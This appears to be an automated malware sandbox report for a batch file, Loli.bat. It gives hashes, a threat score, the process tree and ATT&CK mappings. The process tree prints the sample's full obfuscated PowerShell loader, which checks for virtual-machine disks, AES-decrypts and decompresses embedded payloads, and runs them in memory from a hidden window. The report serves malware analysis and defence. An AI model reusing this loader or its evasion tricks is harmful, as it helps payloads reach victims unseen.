1c217ac7d8a0753006cb2e0173425526240879a5553957f2a9219478157a33c5

General

Target

Loli.bat
Size

7.3MB
MD5

f016a79ee4efcfe7dfc4b71ecb6f702e
SHA1

b2769efff841a916536bf3e2b3e6eeaf25bf2e60
SHA256

1c217ac7d8a0753006cb2e0173425526240879a5553957f2a9219478157a33c5
SHA512

a8afcbb85c5aa752f632d6aa6f9a712f66974b879f85844d91098422bc9004c13d826ecb17bf0c18254237a8e5158da9e42efbcb817f93b84c2bcf476655abbc
SSDEEP

49152:/SCmrpIWAhX+m0p5PBUBdjemTX6lUXl6YgUkzS9gw0pZOojoPhK7fnFZHSmznCH9:z

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2428	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2428	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2428	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2132 wrote to memory of 1148	2132	cmd.exe	31
PID 2132 wrote to memory of 1148	2132	cmd.exe	31
PID 2132 wrote to memory of 1148	2132	cmd.exe	31
PID 2132 wrote to memory of 2112	2132	cmd.exe	32
PID 2132 wrote to memory of 2112	2132	cmd.exe	32
PID 2132 wrote to memory of 2112	2132	cmd.exe	32
PID 2132 wrote to memory of 1724	2132	cmd.exe	33
PID 2132 wrote to memory of 1724	2132	cmd.exe	33
PID 2132 wrote to memory of 1724	2132	cmd.exe	33
PID 2132 wrote to memory of 2420	2132	cmd.exe	34
PID 2132 wrote to memory of 2420	2132	cmd.exe	34
PID 2132 wrote to memory of 2420	2132	cmd.exe	34
PID 2132 wrote to memory of 2548	2132	cmd.exe	35
PID 2132 wrote to memory of 2548	2132	cmd.exe	35
PID 2132 wrote to memory of 2548	2132	cmd.exe	35
PID 2132 wrote to memory of 2428	2132	cmd.exe	36
PID 2132 wrote to memory of 2428	2132	cmd.exe	36
PID 2132 wrote to memory of 2428	2132	cmd.exe	36

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Loli.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2132
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:1148
- C:\Windows\system32\findstr.exe
  findstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"
  2⤵
  PID:2112
- C:\Windows\system32\fsutil.exe
  fsutil fsinfo drives
  2⤵
  PID:1724
- C:\Windows\system32\findstr.exe
  findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
  2⤵
  PID:2420
- C:\Windows\system32\cmd.exe
  cmd.exe /c echo function AivQ($hgJd){ Invoke-Expression -InformationAction Ignore '$hSLE=ND[SNDyNDstNDeNDm.NDSNDecNDuNDrNDitNDyND.NDCNDrNDypNDtNDogNDrNDaNDphNDy.NDANDesND]ND:ND:NDCNDrNDeNDaNDtNDe(ND);'.Replace('ND', ''); Invoke-Expression -Debug '$hSLE.dqModqddqe=dq[dqSydqsdqtedqmdq.dqSedqcdqudqrdqidqtydq.dqCrdqydqpdqtodqgrdqadqphdqydq.dqCdqidqpdqhdqedqrdqModqddqe]dq::dqCBdqCdq;'.Replace('dq', ''); Invoke-Expression -WarningAction Inquire -Verbose -Debug -InformationAction Ignore '$hSLE.mCPamCdmCdimCnmCg=mC[mCSymCsmCtmCemmC.mCSmCemCcmCurmCimCtymC.mCCmCrymCptmComCgrmCamCpmChmCymC.mCPmCamCdmCdimCnmCgMmCodmCe]mC:mC:mCPmCKmCCmCS7mC;'.Replace('mC', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose '$hSLE.KrKeKryKr=[KrSKrysKrtKremKr.KrCKronKrvKreKrrKrtKr]:Kr:KrFrKroKrmKrBaKrseKr6Kr4SKrtKrrKriKrnKrgKr("KrYbKrXKrRAKrKKr81KrSKrTuKrsKrdKrCXKrQKruKrEKrJKr0lKrIKr2SKrnKrUKrMDKrErKrVKr+BKrmKrfKroKrJKrDKryKr4KrvKrhMKr=");'.Replace('Kr', ''); Invoke-Expression -InformationAction Ignore -Debug -Verbose '$hSLE.WFIVWF=WF[SWFyWFstWFeWFm.WFCWFoWFnvWFeWFrWFtWF]WF::WFFWFroWFmWFBWFasWFe6WF4WFStWFrWFiWFnWFgWF("WF9kWFMWFbFWFBWFauWFfWFqyWFRWFpWFgFWFYWFvWFpWF7WFKSWFwWF==WF");'.Replace('WF', ''); $eSNb=$hSLE.CreateDecryptor(); $hGzK=$eSNb.TransformFinalBlock($hgJd, 0, $hgJd.Length); $eSNb.Dispose(); $hSLE.Dispose(); $hGzK;}function GIXc($hgJd){ Invoke-Expression -Verbose -Debug -InformationAction Ignore '$COUM=JPNeJPwJP-OJPbJPjeJPcJPt JPSJPyJPstJPeJPmJP.JPIJPO.JPMJPemJPoJPrJPySJPtrJPeJPamJP(,$hgJd);'.Replace('JP', ''); Invoke-Expression -InformationAction Ignore -Debug '$kqPK=JPNeJPwJP-OJPbJPjeJPcJPt JPSJPyJPstJPeJPmJP.JPIJPO.JPMJPemJPoJPrJPySJPtrJPeJPamJP;'.Replace('JP', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire -Debug -Verbose '$JQWB=fINefIwfI-OfIbfIjefIcfIt fISfIyfIstfIefImfI.fIIfIO.fICfIomfIpfIrfIesfIsifIofIn.fIGfIZfIifIpfISfItfIrfIefIamfI($COUM, fI[IfIOfI.CfIofImpfIrfIesfIsfIifIonfI.fICfIofImfIprfIefIssfIifIofInMfIodfIefI]:fI:fIDfIefIcfIofImfIpfIrfIesfIs);'.Replace('fI', ''); $JQWB.CopyTo($kqPK); $JQWB.Dispose(); $COUM.Dispose(); $kqPK.Dispose(); $kqPK.ToArray();}function ktsY($hgJd,$pIsC){ Invoke-Expression -Verbose -Debug '$ZkiW=GJ[SGJyGJstGJeGJm.GJRGJefGJlGJeGJctGJiGJoGJnGJ.GJAsGJsGJemGJbGJlGJy]GJ::GJLGJoaGJdGJ([byte[]]$hgJd);'.Replace('GJ', ''); Invoke-Expression -Debug '$eNMk=$ZkiW.qOEnqOtqOryqOPqOoiqOnqOt;'.Replace('qO', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Debug -Verbose '$eNMkyj.Iyjnyjvoyjkyje(yj$yjnuyjlyjlyj, $pIsC);'.Replace('yj', '');}$alhi = 'C:\Users\Admin\AppData\Local\Temp\Loli.bat';$host.UI.RawUI.WindowTitle = $alhi;$XrlS=[System.IO.File]::ReadAllText($alhi).Split([Environment]::NewLine);foreach ($ilhy in $XrlS) { if ($ilhy.StartsWith('TFVxY')) { $lMiI=$ilhy.Substring(5); break; }}$fLso=[string[]]$lMiI.Split('\');Invoke-Expression -Debug -WarningAction Inquire '$ZpT = GIXc (AivQ (QY[CQYoQYnvQYeQYrtQY]QY::QYFQYrQYomQYBQYaQYsQYeQY64QYSQYtrQYiQYnQYg($fLso[0].Replace("#", "/").Replace("@", "A"))));'.Replace('QY', '');Invoke-Expression -WarningAction Inquire -Debug -Verbose -InformationAction Ignore '$lru = GIXc (AivQ (QY[CQYoQYnvQYeQYrtQY]QY::QYFQYrQYomQYBQYaQYsQYeQY64QYSQYtrQYiQYnQYg($fLso[1].Replace("#", "/").Replace("@", "A"))));'.Replace('QY', '');Invoke-Expression -Verbose '$XHC = GIXc (AivQ (QY[CQYoQYnvQYeQYrtQY]QY::QYFQYrQYomQYBQYaQYsQYeQY64QYSQYtrQYiQYnQYg($fLso[2].Replace("#", "/").Replace("@", "A"))));'.Replace('QY', '');ktsY $ZpT $null;ktsY $lru $null;ktsY $XHC (,[string[]] (''));
  2⤵
  PID:2548
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -WindowStyle Hidden
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2428-4-0x000007FEF549E000-0x000007FEF549F000-memory.dmp

Filesize
4KB

Download
memory/2428-5-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

Filesize
2.9MB

Download
memory/2428-8-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2428-7-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2428-9-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2428-6-0x00000000027F0000-0x00000000027F8000-memory.dmp

Filesize
32KB

Download
memory/2428-10-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2428-11-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2428-12-0x000007FEF549E000-0x000007FEF549F000-memory.dmp

Filesize
4KB

Download
memory/2428-13-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing